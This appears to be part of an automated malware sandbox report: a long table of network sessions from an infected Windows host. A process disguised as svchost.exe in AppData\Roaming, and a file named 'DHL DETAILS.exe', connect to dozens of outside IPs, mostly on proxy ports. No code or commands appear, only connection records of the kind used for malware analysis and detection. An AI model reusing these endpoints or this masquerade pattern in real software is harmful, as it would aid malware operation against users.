6916	192.168.2.5	65278	34.30.26.177	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6917	192.168.2.5	62833	203.171.19.98	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6918	192.168.2.5	62849	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6919	192.168.2.5	65440	51.15.132.215	16379	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6920	192.168.2.5	65249	194.67.91.153	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6921	192.168.2.5	65345	162.214.227.68	45540	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6922	192.168.2.5	65233	81.17.94.50	34300	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6923	192.168.2.5	65254	148.72.215.230	4990	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6924	192.168.2.5	65313	176.192.65.34	5020	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6925	192.168.2.5	59854	72.206.181.97	64943	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6926	192.168.2.5	62845	45.11.95.165	6039	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6927	192.168.2.5	62378	207.180.234.220	30507	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6928	192.168.2.5	62884	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6929	192.168.2.5	59916	219.71.216.78	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6930	192.168.2.5	62875	60.190.68.154	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6931	192.168.2.5	62629	117.160.250.130	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6932	192.168.2.5	65472	43.255.113.232	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6933	192.168.2.5	62889	35.199.90.225	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6934	192.168.2.5	62917	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6935	192.168.2.5	62911	23.137.248.197	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6936	192.168.2.5	62921	184.185.2.12	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6937	192.168.2.5	62919	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6938	192.168.2.5	62180	117.160.250.163	8828	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6939	192.168.2.5	59917	154.0.14.116	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6940	192.168.2.5	62953	199.58.185.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6941	192.168.2.5	65473	165.232.89.116	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6942	192.168.2.5	62937	112.78.155.210	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6943	192.168.2.5	49172	103.48.68.101	83	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6944	192.168.2.5	62982	104.20.198.49	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6945	192.168.2.5	49179	171.22.108.188	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6946	192.168.2.5	62938	202.162.219.10	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6947	192.168.2.5	49224	51.75.126.150	64615	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6948	192.168.2.5	62989	65.49.38.202	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6949	192.168.2.5	58753	195.248.243.149	7237	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6950	192.168.2.5	60725	8.210.8.157	19001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6951	192.168.2.5	62783	142.54.235.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6952	192.168.2.5	62969	103.146.137.5	1081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6953	192.168.2.5	63003	95.164.207.157	58378	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6954	192.168.2.5	49257	103.156.249.30	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6955	192.168.2.5	60120	52.151.210.204	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6956	192.168.2.5	62993	198.105.101.129	5758	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6957	192.168.2.5	60349	121.204.179.70	7777	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6958	192.168.2.5	59982	45.124.184.13	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6959	192.168.2.5	62987	45.11.95.166	6016	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6960	192.168.2.5	61083	125.227.225.157	3389	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6961	192.168.2.5	62999	218.57.210.186	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6962	192.168.2.5	63009	34.92.12.210	9238	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6963	192.168.2.5	60625	162.241.158.204	63360	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6964	192.168.2.5	61699	98.175.31.195	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6965	192.168.2.5	63011	121.164.200.18	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6966	192.168.2.5	62966	111.206.0.99	8181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6967	192.168.2.5	49281	207.180.198.241	17228	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6968	192.168.2.5	49254	82.223.121.72	4985	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6969	192.168.2.5	63012	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6970	192.168.2.5	60612	143.255.176.161	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6971	192.168.2.5	63003	95.164.207.157	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6972	192.168.2.5	63037	104.25.58.39	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6973	192.168.2.5	63038	185.238.228.96	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6974	192.168.2.5	63034	199.58.185.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6975	192.168.2.5	63027	18.135.211.182	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6976	192.168.2.5	63031	51.15.247.93	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6977	192.168.2.5	60798	212.110.188.207	34405	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6978	192.168.2.5	63057	142.54.235.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6979	192.168.2.5	63123	104.21.31.189	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6980	192.168.2.5	60899	146.190.84.209	18255	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6981	192.168.2.5	55892	198.49.68.80	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6982	192.168.2.5	55464	212.237.218.68	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6983	192.168.2.5	63056	35.199.90.225	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6984	192.168.2.5	60758	184.181.217.194	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6985	192.168.2.5	63199	172.67.181.97	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6986	192.168.2.5	63178	107.180.90.88	8078	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6987	192.168.2.5	63183	162.241.46.6	64353	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6988	192.168.2.5	63211	164.92.86.113	57552	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6989	192.168.2.5	63076	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6990	192.168.2.5	61013	38.50.130.93	5678	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6991	192.168.2.5	63107	221.6.139.190	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6992	192.168.2.5	49332	37.187.73.7	10362	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6993	192.168.2.5	63174	167.86.69.142	36394	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6994	192.168.2.5	60751	112.30.155.83	12792	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6995	192.168.2.5	63131	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6996	192.168.2.5	61007	213.136.75.85	59058	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6997	192.168.2.5	61632	72.49.49.11	31034	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6998	192.168.2.5	63191	102.223.20.217	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6999	192.168.2.5	63239	142.54.235.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7000	192.168.2.5	62818	192.252.216.81	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7001	192.168.2.5	63229	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7002	192.168.2.5	61319	45.189.151.27	999	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7003	192.168.2.5	49349	119.18.149.110	5020	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7004	192.168.2.5	63246	104.16.105.106	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7005	192.168.2.5	62935	217.182.129.103	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7006	192.168.2.5	63279	172.67.182.96	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7007	192.168.2.5	62979	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7008	192.168.2.5	63340	5.161.219.13	4228	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7009	192.168.2.5	63248	8.209.255.13	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7010	192.168.2.5	63454	104.16.221.57	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7011	192.168.2.5	63457	172.67.25.204	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7012	192.168.2.5	61828	138.36.199.14	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7013	192.168.2.5	63362	94.131.64.94	58378	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7014	192.168.2.5	63278	45.11.95.165	5047	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7015	192.168.2.5	63287	212.127.93.185	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7016	192.168.2.5	61944	14.207.65.204	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7017	192.168.2.5	63309	51.15.223.12	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7018	192.168.2.5	63306	93.190.142.57	31280	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7019	192.168.2.5	63346	123.110.158.236	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7020	192.168.2.5	63290	103.153.247.102	8181	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7021	192.168.2.5	63448	177.234.194.226	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7022	192.168.2.5	63363	43.128.146.42	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7023	192.168.2.5	63373	213.252.245.221	6116	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7024	192.168.2.5	63300	103.48.68.101	83	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7025	192.168.2.5	63338	64.43.89.102	6361	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7026	192.168.2.5	63562	104.18.251.208	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7027	192.168.2.5	63473	14.103.24.20	8000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7028	192.168.2.5	63004	138.36.150.16	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7029	192.168.2.5	63362	94.131.64.94	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7030	192.168.2.5	63544	192.252.216.81	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7031	192.168.2.5	62234	51.161.33.206	44523	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7032	192.168.2.5	62000	146.190.85.79	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7033	192.168.2.5	63388	220.194.189.144	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7034	192.168.2.5	63520	8.222.175.210	50554	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7035	192.168.2.5	63543	46.47.197.210	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7036	192.168.2.5	63492	103.86.109.38	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7037	192.168.2.5	49460	162.223.91.11	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7038	192.168.2.5	49449	128.127.94.160	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7039	192.168.2.5	63564	18.169.83.87	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7040	192.168.2.5	62212	138.197.148.215	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7041	192.168.2.5	63598	3.90.100.12	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7042	192.168.2.5	62808	142.54.228.193	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7043	192.168.2.5	63330	117.160.250.131	8899	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7044	192.168.2.5	62359	164.92.86.113	50564	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7045	192.168.2.5	63164	162.240.231.211	35541	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7046	192.168.2.5	58815	138.68.155.22	10760	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7047	192.168.2.5	58890	45.11.95.165	5019	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7048	192.168.2.5	49641	185.109.184.150	63819	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7049	192.168.2.5	63608	194.247.173.17	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7050	192.168.2.5	63257	83.12.149.202	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7051	192.168.2.5	62285	185.49.31.207	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7052	192.168.2.5	63616	93.171.243.253	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7053	192.168.2.5	50012	164.92.86.113	60283	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7054	192.168.2.5	63685	138.68.60.8	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7055	192.168.2.5	63577	5.44.42.115	58386	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7056	192.168.2.5	49493	91.134.140.160	27207	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7057	192.168.2.5	49542	91.134.140.160	56495	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

